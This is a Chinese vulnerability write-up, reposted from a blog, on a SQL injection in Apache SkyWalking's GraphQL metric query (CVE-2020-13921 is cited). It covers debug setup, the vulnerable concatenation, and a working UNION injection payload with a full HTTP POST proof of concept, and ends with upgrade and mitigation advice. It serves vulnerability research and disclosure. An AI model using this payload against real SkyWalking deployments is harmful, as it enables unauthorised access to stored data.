skywalking远程调试Apache SkyWalking SQL注入

转载自博客：https://blog.csdn.net/caiqiiqi/article/details/107857173

参考：

• https://www.openwall.com/lists/oss-security/2020/06/15/1
• https://mp.weixin.qq.com/s/91MWSDYkom2Z8EVYSY37Qw
• http://www.h2database.com/html/functions.html#h2version
• https://s.tencent.com/research/bsafe/1011.html
• https://blog.csdn.net/smooth00/article/details/96479544

编译好的6.5.0版本：

wget https://archive.apache.org/dist/skywalking/6.5.0/apache-skywalking-apm-6.5.0.tar.gz
cd apache-skywalking-apm-bin/bin
vi oapService.sh

• 1
• 2
• 3

加上调试参数：

DEBUG_OPTIONS="-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=12346"

• 1

然后启动：

./startup.sh

• 1

发现已经在监听12346端口了。

下载6.5.0源码 (https://www.apache.org/dyn/closer.cgi/skywalking/6.5.0/apache-skywalking -apm-6.5.0-src.tgz)

导入IDEA，添加Remote Configuration，并设置module classpath为oap-server。

漏洞描述：

When use H2/MySQL/TiDB as Apache SkyWalking storage, the
metadata query through GraphQL protocol, there is a SQL injection
vulnerability,
which allows to access unpexcted data. Apache SkyWalking
6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don’t use the
appropriate way to set SQL parameters.

影响版本：
6.0.0-6.6.0, 7.0.0

我改成tcp形式才成功，默认的h2是内存型的，没找到表，导致失败了。 编辑application.yml：

通过调试可以发现对id参数进行了拼接：

于是对id参数构造payload：

id: \"') UNION SELECT 1,CONCAT('~', H2VERSION(), '~')--\"

• 1

由于where查询语句已经结束，可以使用union注入，最后使用--注释掉后面的内容。

Demo：

调用栈：

executeQuery:106, JDBCHikariCPClient (org.apache.skywalking.oap.server.library.client.jdbc.hikaricp)
getLinearIntValues:117, H2MetricsQueryDAO (org.apache.skywalking.oap.server.storage.plugin.jdbc.h2.dao)
getLinearIntValues:96, MetricQueryService (org.apache.skywalking.oap.server.core.query)
getLinearIntValues:60, MetricQuery (org.apache.skywalking.oap.query.graphql.resolver)
invoke:-1, MetricQueryMethodAccess (org.apache.skywalking.oap.query.graphql.resolver)
get:147, MethodFieldResolverDataFetcher (com.coxautodev.graphql.tools)
fetchField:227, ExecutionStrategy (graphql.execution)
resolveField:170, ExecutionStrategy (graphql.execution)
execute:59, AsyncExecutionStrategy (graphql.execution)
executeOperation:158, Execution (graphql.execution)
execute:100, Execution (graphql.execution)
execute:558, GraphQL (graphql)
parseValidateAndExecute:500, GraphQL (graphql)
executeAsync:470, GraphQL (graphql)
execute:401, GraphQL (graphql)
execute:87, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql)
doPost:81, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql)
doPost:54, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
service:707, HttpServlet (javax.servlet.http)
service:101, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
service:790, HttpServlet (javax.servlet.http)
service:105, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
handle:841, ServletHolder (org.eclipse.jetty.servlet)
doHandle:543, ServletHandler (org.eclipse.jetty.servlet)
nextHandle:188, ScopedHandler (org.eclipse.jetty.server.handler)
doHandle:1239, ContextHandler (org.eclipse.jetty.server.handler)
nextScope:168, ScopedHandler (org.eclipse.jetty.server.handler)
doScope:481, ServletHandler (org.eclipse.jetty.servlet)
nextScope:166, ScopedHandler (org.eclipse.jetty.server.handler)
doScope:1141, ContextHandler (org.eclipse.jetty.server.handler)
handle:141, ScopedHandler (org.eclipse.jetty.server.handler)
handle:132, HandlerWrapper (org.eclipse.jetty.server.handler)
handle:564, Server (org.eclipse.jetty.server)
handle:320, HttpChannel (org.eclipse.jetty.server)
onFillable:251, HttpConnection (org.eclipse.jetty.server)
succeeded:279, AbstractConnection$ReadCallback (org.eclipse.jetty.io)
fillable:110, FillInterest (org.eclipse.jetty.io)
run:124, ChannelEndPoint$2 (org.eclipse.jetty.io)
runJob:672, QueuedThreadPool (org.eclipse.jetty.util.thread)
run:590, QueuedThreadPool$2 (org.eclipse.jetty.util.thread)
run:748, Thread (java.lang)

• 1
• 2
• 3
• 4
• 5
• 6
• 7
• 8
• 9
• 10
• 11
• 12
• 13
• 14
• 15
• 16
• 17
• 18
• 19
• 20
• 21
• 22
• 23
• 24
• 25
• 26
• 27
• 28
• 29
• 30
• 31
• 32
• 33
• 34
• 35
• 36
• 37
• 38
• 39
• 40
• 41

poc:

POST /graphql HTTP/1.1
Host: cqq.com:8080
Content-Type: application/json;charset=utf-8
Content-Length: 313
Connection: close

{"query":"query queryData($duration: Duration!) {globalP99: getLinearIntValues(metric: {name: \"all_p99\", id: \"') UNION ALL SELECT NULL,CONCAT('~', H2VERSION(), '~')--\" }, duration: $duration) {  values { value } }}","variables":{"duration":{"start":"2020-08-07 1417","end":"2020-08-07 1418","step":"MINUTE"}}}

• 1
• 2
• 3
• 4
• 5
• 6
• 7

修复建议：
升级Apache SkyWalking至8.0版，升级链接：https://github.com/apache/skywalking/releases

如暂时无法升级，作为缓解措施，建议不要将Apache SkyWalking的GraphQL接口暴露在外网，或在GraphQL接口之上增加一层认证。

CVE-2020-13921

Only when using H2/MySQL/TiDB as Apache
SkyWalking storage, there is a SQL injection vulnerability in the wildcard
query cases.

参考：
https://lists.apache.org/thread.html/r6f3a934ebc54585d8468151a494c1919dc1ee2cccaf237ec434dbbd6@%3Cdev.skywalking.apache.org%3E